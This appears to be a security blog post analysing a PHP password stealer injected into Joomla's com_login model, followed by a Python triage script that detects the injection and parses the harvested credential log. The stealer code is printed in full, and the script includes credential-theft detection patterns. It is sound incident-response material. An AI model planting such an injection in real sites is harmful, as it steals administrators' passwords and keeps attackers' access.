As we know, one of the main goals of a successful attack is to maintain access to the compromised server for as long as possible. Today we found this simple but effective password stealer for Joomla:
```php
// Injected into administrator/components/com_login/models/login.php by the attacker.
// Open (or create) a plain-text log next to the model, in append mode.
$fh = fopen("components/com_login/models/login.txt", 'a');
date_default_timezone_set("America/Chicago");
// Record timestamp, client IP and the submitted username:password in clear text.
fwrite($fh,date('m/d/Y H:i:s', time())." $_SERVER[REMOTE_ADDR] [$credentials[username]:$credentials[password]]\n");
fclose($fh);
```

It was injected into /administrator/components/com_login/models/login.php. The code simply captures the $credentials array, specifically the username and password, and writes them to a login.txt file that was accessible from the internet. To make things even easier for the attacker, it records the date and time of each capture in the Chicago timezone (so is the attacker in Chicago?). Every administrator password entered while this code was in place has to be treated as compromised and rotated, not just the account the attacker originally broke in with.
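The triage script below is an added example written for this post; it is not the stealer's code or Joomla's own code. It automates the three things a responder would check after reading the above: PHP files under the Joomla tree that call a write or send function within a few lines of touching $credentials or a password key, non-PHP files dropped into a component's models/ directory (the place where login.txt sat, web-accessible), and the harvested log itself, parsed in the attacker's own "date IP [user:pass]" format to list which accounts must be rotated and which source IPs to block. The Joomla-like directory tree, the clean stand-in model file and the log lines are all constructed for the demo; the injected snippet is the one shown in the post.

```python
"""Triage helpers for the com_login credential stealer described above.

Added example, not code from the original post. Three checks a responder
would run against a suspect Joomla tree:
  1. flag PHP that calls a write/send function within a few lines of
     touching $credentials or a password array key;
  2. flag non-PHP files under components/*/models/ (the dropped login.txt
     log is web-accessible there);
  3. parse any such log in the attacker's own format to list the accounts
     and source IPs that need rotation and blocking.
All paths and sample contents below are constructed for the demo.
"""
import json
import re
import tempfile
from pathlib import Path

WRITE_CALL = re.compile(r"\b(fwrite|fputs|file_put_contents|error_log|mail|curl_exec)\s*\(")
CRED_REF = re.compile(r"\$credentials\s*\[|\[\s*['\"]?(password|passwd|pass)['\"]?\s*\]")
ALLOWED_EXT = {".php", ".xml", ".html"}  # what legitimately lives in a models/ dir
# "m/d/Y H:i:s <ip> [<user>:<pass>]": split on the first colon only, because
# the attacker's format leaves passwords containing ':' ambiguous.
LOG_LINE = re.compile(r"^(\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2}) (\S+) \[([^:\]]*):(.*)\]$")

# Constructed: the stealer from the post appended to a stand-in model file.
INJECTED_LOGIN_PHP = """<?php
// constructed stand-in for the real Joomla model code above the injection
defined('_JEXEC') or die;
class LoginModelLogin extends JModelLegacy {}
$fh = fopen("components/com_login/models/login.txt", 'a');
date_default_timezone_set("America/Chicago");
fwrite($fh,date('m/d/Y H:i:s', time())." $_SERVER[REMOTE_ADDR] [$credentials[username]:$credentials[password]]\\n");
fclose($fh);
"""
# Constructed: legitimate-looking code that handles credentials but never writes them.
CLEAN_MODEL_PHP = """<?php
defined('_JEXEC') or die;
$credentials = array('username' => $username, 'password' => $password);
return $app->login($credentials, $options);
"""
# Constructed: what a harvested login.txt looks like (documentation IP ranges).
SAMPLE_LOG = """03/14/2013 09:15:02 203.0.113.45 [admin:Tr0ub4dor&3]
03/14/2013 09:16:40 203.0.113.45 [editor:pa:ss:word]
03/15/2013 22:01:13 198.51.100.7 [admin:Tr0ub4dor&3]
"""


def scan_php_source(source, window=3):
    """1-based line numbers of write calls within `window` lines of a credential reference."""
    lines = source.splitlines()
    cred = [i for i, ln in enumerate(lines) if CRED_REF.search(ln)]
    return [i + 1 for i, ln in enumerate(lines)
            if WRITE_CALL.search(ln) and any(abs(i - c) <= window for c in cred)]


def parse_capture_log(text):
    """Entries of a harvested log in the stealer's format; unparseable lines are skipped."""
    out = []
    for ln in text.splitlines():
        m = LOG_LINE.match(ln)
        if m:
            out.append({"time": m.group(1), "ip": m.group(2),
                        "user": m.group(3), "password": m.group(4)})
    return out


def summarize(entries):
    """Deduplicated accounts to rotate and source IPs to block."""
    return {"users": sorted({e["user"] for e in entries}),
            "ips": sorted({e["ip"] for e in entries})}


def scan_tree(root):
    """Run all three checks over a Joomla install rooted at `root`."""
    root = Path(root)
    findings = {"code": {}, "stray_files": [], "captured": {}}
    for php in root.rglob("*.php"):
        hits = scan_php_source(php.read_text(errors="replace"))
        if hits:
            findings["code"][php.relative_to(root).as_posix()] = hits
    for models_dir in root.glob("**/components/*/models"):
        for p in models_dir.rglob("*"):
            if p.is_file() and p.suffix.lower() not in ALLOWED_EXT:
                rel = p.relative_to(root).as_posix()
                findings["stray_files"].append(rel)
                entries = parse_capture_log(p.read_text(errors="replace"))
                if entries:  # a stray file that parses as a capture log
                    findings["captured"][rel] = summarize(entries)
    findings["stray_files"].sort()
    return findings


def demo():
    """Build a constructed Joomla-like tree in a temp dir, scan it, return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        models = root / "administrator" / "components" / "com_login" / "models"
        models.mkdir(parents=True)
        (models / "login.php").write_text(INJECTED_LOGIN_PHP)
        (models / "login.txt").write_text(SAMPLE_LOG)
        (models / "index.html").write_text("<!DOCTYPE html><title></title>")
        clean = root / "administrator" / "components" / "com_users" / "models"
        clean.mkdir(parents=True)
        (clean / "user.php").write_text(CLEAN_MODEL_PHP)
        return scan_tree(root)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The code check is deliberately a proximity heuristic rather than an exact signature: an attacker only has to move the fwrite a few lines away or rename the temp file, so matching "a write near a credential" survives the trivial variants, while the stray-file check catches the log even when the injected PHP has been cleaned up. Treat every user listed under "captured" as compromised and reset those passwords before anything else.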



